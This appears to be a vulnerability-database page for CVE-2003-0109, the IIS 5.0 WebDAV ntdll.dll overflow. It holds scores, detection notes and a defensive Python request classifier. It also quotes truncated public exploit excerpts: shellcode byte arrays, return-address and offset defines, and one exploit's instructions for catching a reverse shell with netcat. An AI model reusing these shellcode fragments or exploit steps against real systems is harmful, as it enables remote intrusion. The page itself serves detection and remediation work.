CVE-2003-0109
Published: 2003-03-31
Priority: P2 · 74 · high
CVSS 2.0 base score: 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
In the wild: exploit available; listed in VulnCheck KEV
Exploited in the wild
EPSS: 86.40% (99.7th percentile)
Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.
Detection & IOCs (extracted from sources)
Byte patterns (shellcode fragments quoted in the sources):
\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc\xcc\xcc\xf3\xab
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f
\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7
Detection notes:
- Detect oversized SEARCH-method WebDAV requests to IIS on port 80; the exploit sends a SEARCH request with a URL of ~65514-65535 characters to trigger the ntdll.dll overflow.
- Detect HTTP SEARCH requests with Content-Type: text/xml and a body containing the WebDAV SQL-like query 'Select "DAV:displayname" from scope()' paired with an abnormally long URI.
- Check the response body for the string 'Server Error(exception' as an indicator of a vulnerable IIS 5.0 host, as the Metasploit module's check() function does.
- Vulnerability scanners may report this IIS WebDAV bug on ports 139 and 445; remap such detections back to port 80 for accurate correlation.
- The W32.Welchia worm actively exploited this vulnerability; treat mass scanning of port 80 with oversized SEARCH WebDAV requests as a worm-propagation indicator.
- The bad characters for payload encoding are known; payloads avoid null bytes and URL-special characters: 0x00, 0x3a, 0x26, 0x3f, 0x25, 0x23, 0x20, 0x0a, 0x0d, 0x2f, 0x2b, 0x0b, 0x5c.
Caveats:
- Windows NT 4.0 does not support WebDAV, so WebDAV-based exploit attempts will not be effective against NT 4.0 systems, though the underlying ntdll.dll vulnerability is still present.
- Windows XP does not include WebDAV by default, but WebDAV may be installed by a user on Windows XP with IIS 5.1, making it a possible exploitation vector in those cases.
- The Metasploit module only works against Windows 2000 (SP0-SP3) and brute-forces the return address; it does not reliably exploit other Windows versions via this method.
- The Microsoft patch Q815021 corrects both vulnerable functions, RtlDosPathNameToNtPathName_U and RtlGetFullPathName_U; both must be patched to fully remediate the vulnerability.
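As an added example (not code from this page or from any of the exploit sources it lists), the following Python classifier applies the request-side detection notes above to raw HTTP requests: the SEARCH-method URI-length rule, the text/xml body rule with the DAV:displayname query, and the port remapping for scanner detections. The 4 KB "abnormal URI" cut-off and the sample requests are my own constructed assumptions.

```python
# Thresholds from the detection notes: the exploit's SEARCH URI is ~65514-65535
# characters; the 4 KB cut-off for "abnormally long" is an assumption of this example.
EXPLOIT_URI_RANGE = range(65514, 65536)
LONG_URI = 4096
DAV_QUERY = b'Select "DAV:displayname" from scope()'
SCANNER_PORTS = {139, 445}   # ports some scanners mislabel this IIS bug on


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, uri, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return method.decode(), uri, headers, body


def classify(raw: bytes, dst_port: int = 80) -> dict:
    """Return the normalised port, whether to alert, and which rules matched."""
    method, uri, headers, body = parse_request(raw)
    # Remap SMB-port detections back to 80 so they correlate with the web server.
    port = 80 if dst_port in SCANNER_PORTS else dst_port
    reasons = []
    if method == "SEARCH":
        if len(uri) in EXPLOIT_URI_RANGE:
            reasons.append("uri-length-in-exploit-range")
        elif len(uri) > LONG_URI:
            reasons.append("oversized-uri")
        is_xml = headers.get("content-type", "").startswith("text/xml")
        if is_xml and DAV_QUERY in body and len(uri) > LONG_URI:
            reasons.append("dav-query-with-long-uri")
    return {"port": port, "alert": bool(reasons), "reasons": reasons}


def sample_search(uri_len: int) -> bytes:
    """Constructed test fixture (not captured traffic): SEARCH with a uri_len-byte path."""
    body = (b'<?xml version="1.0"?>\r\n<g:searchrequest xmlns:g="DAV:">\r\n'
            b"<g:sql>\r\n" + DAV_QUERY + b"\r\n</g:sql>\r\n</g:searchrequest>")
    return (b"SEARCH /" + b"A" * (uri_len - 1) + b" HTTP/1.1\r\n"
            b"Host: iis.example\r\nContent-Type: text/xml\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed benign WebDAV request: same content type, normal method and path.
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: iis.example\r\nDepth: 1\r\n"
          b"Content-Type: text/xml\r\nContent-Length: 0\r\n\r\n")
```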
CVSS provenance
NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 7.5 HIGH
GHSA
GHSA-949q-m2rc-xq42: Buffer overflow in ntdll (HIGH; ghsa_unreviewed, 2022-04-29)
(Description identical to the NVD summary above.)
VulnCheck
Microsoft Windows Out-of-bounds Write (HIGH; vulncheck, 2003, CVSS 7.5)
(Description identical to the NVD summary above.)
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) (exploitdb, 2010-07-25)
---
##
# $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LIC
Exploit-DB
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) (exploitdb, 2003-07-08)
---
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright (c) 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\
Exploit-DB
Microsoft Windows - WebDAV Remote Code Execution (2) (exploitdb, 2003-06-01)
---
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* 29/05/2003 - by Alumni - */
/* Microsoft IIS WebDAV New Exploit */
/* spawns shell on port 32768 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#include
#include
#include
#define SHELLCODELEN 753
#define NOP 0x90
#define BUFFERLEN 1024
#define RET 0x41424344
#define GMHOFF 30
#define GPAOFF 38
#define IPOFF 161
#define DEFPORT 32768
//#define DEBUGGEE_FLOW // for debug only
#ifdef DEBUGGEE_FLOW
#define GMH (long)GetModuleHandle
#define GPA (long)GetProcAddress
#else
#define GMH 0x0100107C // GetModuleHandle@
#define GPA 0x01001034 // GetProcAddress@
#endif
#define XOROFF 11
#define SOFF 16
char prologue[] =
"\xEB\x03" // jmp $+3
"\x58" // pop eax
"\x50" // push eax
"\xC3" // retn
"
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3) (exploitdb, 2003-04-04)
---
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to pat
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2) (exploitdb, 2003-03-31)
---
// source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has re
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1) (exploitdb, 2003-03-24)
---
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to pat
Exploit-DB
Microsoft IIS 5.0 - WebDAV Remote (exploitdb, 2003-03-24)
---
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ====================================================================
* --[ READ ME ]
*
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The
Exploit-DB
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow (exploitdb, 2003-03-23)
---
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4) (exploitdb, 2003-03-17)
---
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revis
Metasploit
MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow (metasploit)
This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against SP0 to SP3.
No writeups or analysis indexed.
References
http://marc.info/?l=bugtraq&m=104826476427372&w=2
http://marc.info/?l=bugtraq&m=104861839130254&w=2
http://marc.info/?l=bugtraq&m=104869293619064&w=2
http://marc.info/?l=bugtraq&m=104887148323552&w=2
http://marc.info/?l=bugtraq&m=105768156625699&w=2
http://marc.info/?l=ntbugtraq&m=104826785731151&w=2
http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ815021
http://www.cert.org/advisories/CA-2003-09.html
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029
http://www.iss.net/security_center/static/11533.php
http://www.kb.cert.org/vuls/id/117394
http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
http://www.securityfocus.com/bid/7116
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-007
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A109